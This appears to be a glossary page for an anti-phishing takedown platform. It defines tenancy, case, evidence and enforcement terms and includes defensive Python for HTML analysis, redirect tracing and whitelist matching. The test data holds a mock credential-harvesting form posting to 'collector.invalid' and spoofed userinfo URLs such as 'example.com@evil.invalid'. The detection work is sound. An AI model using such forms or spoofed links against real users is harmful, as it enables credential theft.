Unphish v2 Docs

Glossary

Definitions for every term used across the Unphish v2 platform.

Definitions are alphabetized within each section.

Tenancy and identity

API Application — A client-side OAuth-style application registration. Holds one or more API keys.

API Key — A scoped, revocable credential that authenticates programmatic access. Tracks last-used timestamp and is rate-limited.

Brand — A protected entity (trademark, product line, domain identity) belonging to a client. One client can own many brands. Carries logos, screenshots, official visual references, and color/identity metadata.

Client — A rights owner under an organization. The customer for whom enforcement happens. A client owns brands, policies, quotas, and members.

Identity — A user's authentication record at Authentik (sub, email, profile). Mapped to an app user by email or stable subject.

Membership — A user's relationship to an organization or client, including a canonical role.

Organization — The top-level tenant. Unphish itself, each partner, and each direct customer is one organization.

SSO Domain — A verified email domain that controls organization sign-in routing.

System Role — The internal Unphish-wide role: user, staff, or admin. Distinct from organization role. Controls Hub, delivery board, and architecture access.

Team Invitation — An app-owned invite token with email, role, organization or client scope, expiry, and accepted/revoked timestamps.

User — An authenticated person.

Cases and enforcement

Case — The central record for one threat against one brand. Carries status, activity, evidence, classification, and workflow.

Case Activity — The fine-grained lifecycle stage of a case (agent_review, client_review, enforcement_submitted, etc.).

Case Status — The high-level state of a case (open, pending, enforcing, verifying, closed, dismissed, reopened, on_hold).

Classification Run — A model + rules output for a case. Stores visual, NLP, domain, and evidence sub-scores plus confidence, label, route, and explanation.

Enforcement — A takedown record linked to one or more cases. Dispatched on a specific channel.

Enforcement Channel — A configured route for action: XARF, CleanDNS, registrar, hosting provider, Meta, X, Cloudflare, Google Safe Browsing, Microsoft SmartScreen, or manual browser-extension.

Enforcement Status — draft, form_filled, queued, submitted, received_request, actioned_request, partial_action, rejected_request, escalated, cancelled.

Enforcement Submission — The specific outbound submission for one enforcement on one channel.

Enforcement Template — The channel-specific form, email, API, or XARF schema.

Provider Response — A received, actioned, partial, rejected, unresponsive, or escalation response from an enforcement channel.

Evidence

Attachment — A user- or system-provided evidence file.

DNS Record Set — A, AAAA, MX, NS, TXT, CNAME records plus ASN, host, ISP, country.

Email Evidence — Headers, MX records, attachments, and parsed indicators for an email-based threat.

Evidence Package — The canonical bundle of all evidence used for review and enforcement.

HTML Analysis — Title, meta tags, forms, scripts, text, language, and intent summary for a captured page.
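The fields listed for HTML Analysis can be produced from a captured page with the standard library alone. The following is an added illustration, not Unphish code: it extracts title, meta tags, forms (with the action resolved against the capture URL), external scripts and visible text, and derives a few intent indicators of the kind a credential-harvesting page exhibits. The sample page, the `.invalid` hostnames and the indicator names are constructed for the example; the platform's real schema and scoring are not described on this page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class CapturedPageParser(HTMLParser):
    """Collects title, meta tags, forms, external scripts and visible text."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.title = ""
        self.meta = {}
        self.forms = []
        self.scripts = []
        self.text_parts = []
        self._form = None
        self._hidden = None  # script/style/title: contents are not page text

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style", "title"):
            self._hidden = tag
        if tag == "meta":
            key = a.get("name") or a.get("property") or a.get("http-equiv")
            if key and a.get("content") is not None:
                self.meta[key.lower()] = a["content"]
        elif tag == "form":
            # A relative or empty action posts back to the captured page, so
            # resolve it against the capture URL before judging its host.
            self._form = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append(
                {"name": a.get("name") or "", "type": (a.get("type") or "text").lower()}
            )
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.page_url, a["src"]))

    def handle_endtag(self, tag):
        if tag == self._hidden:
            self._hidden = None
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None

    def handle_data(self, data):
        if self._hidden == "title":
            self.title += data
        elif self._hidden is None and data.strip():
            self.text_parts.append(data.strip())


def analyze_html(page_url, html):
    """Return the HTML-analysis fields plus intent indicators for one capture."""
    p = CapturedPageParser(page_url)
    p.feed(html)
    p.close()
    page_host = urlsplit(page_url).hostname or ""
    indicators = set()
    for form in p.forms:
        types = {i["type"] for i in form["inputs"]}
        target = urlsplit(form["action"])
        if "password" in types:
            indicators.add("credential_form")
            # Credentials leaving the captured host is the classic harvester shape.
            if target.hostname and target.hostname != page_host:
                indicators.add("offsite_credential_post")
            if target.scheme == "http":
                indicators.add("cleartext_credential_post")
            if form["method"] != "post":
                indicators.add("credential_via_get")
    return {
        "title": p.title.strip(),
        "meta": p.meta,
        "forms": p.forms,
        "scripts": p.scripts,
        "text": " ".join(p.text_parts),
        "indicators": sorted(indicators),
    }


# Constructed capture for the example; not a real page or domain.
PAGE_URL = "https://examp1e-bank.invalid/login"
SAMPLE_HTML = """<html><head><title>Sign in - Example Bank</title>
<meta name="description" content="Secure login">
<meta property="og:site_name" content="Example Bank">
<script src="/static/app.js"></script>
<script>var k = "inline";</script>
</head><body><h1>Welcome back</h1>
<form action="https://collector.invalid/post.php" method="POST">
<input name="user" type="text"><input name="pass" type="password">
<input type="submit" value="Sign in"></form></body></html>"""

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_html(PAGE_URL, SAMPLE_HTML), indent=2))
```

The indicators are deliberately narrow: a form that collects a password and posts it to a host other than the captured one is evidence, not a verdict, and it is the classification run that combines such signals. Pages that assemble forms or exfiltrate credentials from JavaScript will not show up in a static parse like this one, which is why a screenshot and a redirect trace accompany the HTML analysis.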

Note — An analyst, client, or system comment on a case. Has a type, title, body, author, and optional linked event.

Redirect Trace — The ordered HTTP redirect chain with status, headers, and final URL.
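A redirect trace has to follow hops by hand rather than letting an HTTP client do it, because the intermediate statuses, headers and the reason tracing stopped are exactly the evidence. The example below is an added illustration, not Unphish code. It resolves relative `Location` values, caps the hop count, detects loops and records redirects that carry no `Location` at all. The transport is injected so the sample runs offline against constructed responses; `http_fetch` is an optional real transport built on `urllib` that never follows redirects itself. All URLs, hostnames and result labels are assumptions for the example.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def trace_redirects(start_url, fetch, max_hops=10):
    """Follow HTTP redirects manually and record every hop.

    fetch(url) -> (status, headers) and must NOT follow redirects itself.
    Returns the ordered chain, the final URL and why tracing stopped:
    landed | loop | max_hops | missing_location | unsupported_scheme.
    """
    hops, seen, url = [], set(), start_url
    while True:
        if url in seen:
            return _result(hops, url, "loop")
        if len(hops) >= max_hops:
            return _result(hops, url, "max_hops")
        seen.add(url)
        status, headers = fetch(url)
        headers = {k.lower(): v for k, v in headers.items()}
        hops.append({"url": url, "status": status, "headers": headers})
        if status not in REDIRECT_STATUSES:
            return _result(hops, url, "landed")
        location = headers.get("location")
        if not location:
            return _result(hops, url, "missing_location")
        # Location may be relative (RFC 7231 allows it); resolve against the current URL.
        nxt = urljoin(url, location)
        if urlsplit(nxt).scheme not in ("http", "https"):
            return _result(hops, nxt, "unsupported_scheme")
        url = nxt


def _result(hops, final_url, terminated):
    return {"hops": hops, "final_url": final_url, "terminated": terminated}


def http_fetch(url, timeout=10):
    """Real transport: one request, redirects surfaced instead of followed."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # makes urllib raise HTTPError for 3xx instead of following

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers.items())
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers.items())


# Constructed responses standing in for the network; unknown URLs 404.
FAKE_RESPONSES = {
    "http://short.invalid/x": (301, {"Location": "https://short.invalid/x"}),
    "https://short.invalid/x": (302, {"Location": "/go?u=1"}),
    "https://short.invalid/go?u=1": (307, {"Location": "https://landing.invalid/login"}),
    "https://landing.invalid/login": (200, {"Content-Type": "text/html"}),
    "https://loop.invalid/a": (302, {"Location": "/b"}),
    "https://loop.invalid/b": (302, {"Location": "/a"}),
    "https://broken.invalid/": (302, {}),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, {}))


if __name__ == "__main__":
    for start in ("http://short.invalid/x", "https://loop.invalid/a", "https://broken.invalid/"):
        r = trace_redirects(start, fake_fetch)
        print(start, "->", r["final_url"], f"[{r['terminated']}]",
              [h["status"] for h in r["hops"]])
```

Only HTTP-level redirects are captured here; `meta refresh` and JavaScript redirects surface in the HTML analysis and the screenshot, not in this trace. The lowercase-key header copy matters because header names arrive in arbitrary case and the evidence package should index them consistently.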

Screenshot — A desktop, mobile, or full-page capture with device, browser, viewport, geo, and timestamp.

SSL Certificate — Issuer, subject, SANs, validity, CT log references, and free-cert indicators.

Tag — A categorization label for filtering and workflow.

WHOIS / RDAP Record — Registrar, registrant-derived data where legal, creation/update/expiry dates.

Detection and monitoring

Detection Source — A module or provider that produced a threat (URLScan, WhoisXML, NothingPhishy, gse.live, WhoisFreaks, client API, manual entry).

Query Folder — A grouping for related scan queries.

Query Keyword — An included or excluded keyword in a scan query.

Query Site Search / Query Site Exclusion — Included or excluded sites or domains in a scan query.

Resurrection Monitor — The post-closure monitoring window. Defaults to 30 days. Reopens the case if the threat reappears.

Scan — An execution run for one or more detection queries.

Scan Query — The configured parameters for one scan.

Threat Submission — A manual, API, feed, bulk, or workbench-submitted threat. Becomes a case, watchlist item, or dismissal.

Verification Check — A scheduled or manual DNS, HTTP, visual, provider, or blocklist check.

Verification Status — active, checking, down, partially_down, resurrected, inconclusive, failed.

Watchlist Item — A monitored domain or asset, typically one that is dormant or awaiting activation.

Watchlist Subscriber — A user subscribed to alerts for a watchlist item.

Watchlist Update — A DNS, subdomain, status-code, WHOIS, screenshot, metadata, or availability change on a watchlist item.

Whitelist Item — An approved URL, domain, email, or entity that should not create cases.
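A Whitelist Item is only safe if matching is done on parsed, normalized components rather than on substrings, otherwise `notexample.com`, or a URL that merely contains the approved domain in its userinfo or path, would be dismissed. The following added example, not Unphish code, shows the check that turns a Threat Submission into either a dismissal or a case for URL, domain and email submissions. It normalizes case, trailing dots and Unicode labels (to punycode), applies domain entries to subdomains but never to look-alike suffixes, and matches email and URL entries exactly. The `kind`/`value` record shape, the `.invalid` hostnames and the two-way outcome are assumptions for illustration; the page's third outcome, a watchlist item for dormant domains, depends on activity data that this snippet does not model.

```python
from urllib.parse import urlsplit


def normalize_host(host):
    """Lowercase, strip the trailing dot, and convert Unicode labels to punycode."""
    host = (host or "").lower().rstrip(".")
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return host


def host_under(host, domain):
    """True when host equals domain or is a subdomain of it (label-aware, not substring)."""
    return bool(host) and (host == domain or host.endswith("." + domain))


def normalize_url(url):
    """Comparable tuple for exact URL entries: scheme, host, path, query (fragment dropped)."""
    if "://" not in url:
        url = "http://" + url  # bare hostnames parse as paths otherwise
    u = urlsplit(url)
    return (u.scheme.lower(), normalize_host(u.hostname), u.path or "/", u.query)


def match_whitelist(kind, value, whitelist):
    """Return the matching whitelist item, or None. kind is url | domain | email."""
    if kind == "url":
        host = normalize_url(value)[1]   # hostname, not userinfo: a@b.invalid gives b.invalid
    elif kind == "email":
        host = normalize_host(value.rpartition("@")[2])
    else:
        host = normalize_host(value)
    for item in whitelist:
        ikind, ivalue = item["kind"], item["value"]
        if ikind == "domain" and host_under(host, normalize_host(ivalue)):
            return item
        if ikind == "email" and kind == "email" and value.lower() == ivalue.lower():
            return item
        if ikind == "url" and kind == "url" and normalize_url(value) == normalize_url(ivalue):
            return item
    return None


def triage(submission, whitelist):
    """(kind, value) -> ('dismissal', matched item) or ('case', None)."""
    kind, value = submission
    item = match_whitelist(kind, value, whitelist)
    return ("dismissal", item) if item else ("case", None)


# Constructed whitelist for the example; none of these are real entries.
WHITELIST = [
    {"kind": "domain", "value": "example.com"},
    {"kind": "domain", "value": "bücher.invalid"},
    {"kind": "email", "value": "billing@partner.invalid"},
    {"kind": "url", "value": "https://cdn.partner.invalid/assets/logo.png"},
]

if __name__ == "__main__":
    for sub in [
        ("url", "https://login.EXAMPLE.com./auth"),
        ("url", "https://notexample.com/auth"),
        ("url", "https://example.com@evil.invalid/login"),
        ("url", "https://evil.invalid/example.com/login"),
        ("domain", "xn--bcher-kva.invalid"),
        ("email", "Billing@Partner.invalid"),
        ("email", "support@partner.invalid"),
        ("url", "https://CDN.partner.invalid./assets/logo.png"),
        ("url", "https://cdn.partner.invalid/assets/logo.png?x=1"),
    ]:
        print(sub, "->", triage(sub, WHITELIST)[0])
```

Two details carry the security weight: the URL host comes from `urlsplit(...).hostname`, so an approved domain placed in the userinfo (`https://example.com@evil.invalid/`) cannot suppress a case, and suffix matching is done on a leading dot, so `example.com.evil.invalid` and `notexample.com` both still become cases.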

Workflows and intelligence

Indicator — A domain, URL, IP, ASN, certificate, email, hash, or other IOC.

Policy Decision — The evaluated client policy with approval requirement, selected channel, automation threshold, and routing reason.

Threat Actor — An inferred or known adversary profile.

Threat Cluster — A campaign grouping based on shared infrastructure, behavior, brand, source, or evidence.

Workflow Run — A durable orchestration instance, typically backed by Temporal, for a case or batch.

Workflow Step — A deterministic step within a workflow with payload, result, duration, retries, errors, and logs.

Workflow Step Status — pending, running, paused, succeeded, failed, retrying, cancelled, skipped.

Operations and infrastructure

Audit Log — The append-only record of security, data, workflow, and operational events.

Authentik — The identity provider. Runs outside Vercel on its own infrastructure. Owns passwords, recovery, MFA, and SSO federation.

Data Source Status — The provenance label on a piece of data: live, imported, demo, fixture, or unavailable.

Demo — The customer-facing demonstration environment. Curated fixtures, scripted journeys, no real mutations.

Hub — The internal Unphish operating console. Environment tiles, team, secrets, readiness, audit.

Neon / Postgres — The primary database for Unphish v2.

Postmark — The transactional email provider for invitations, notifications, and reports.

Render — The host for the long-running Temporal worker, Authentik, and other always-on services. Vercel handles the Next.js app; Render handles workers and identity.

Report Run — A generated report output with recipients, status, metrics, and file references.

Report Schedule — A weekly, monthly, or custom-cadence report configuration.

Staging — The pre-production environment. Same routes as production, staging-safe external effects.

Temporal — The durable workflow orchestrator. Powers ingestion, enrichment, enforcement, verification, and scheduled reports.

Temporal Cloud — The hosted Temporal namespace where workflow state lives.

Vercel — The host for the Next.js application and preview deployments.

Workbench — The developer/QA sandbox surface. Same data contracts as production with provider transport switched to fixture or sandbox mode.
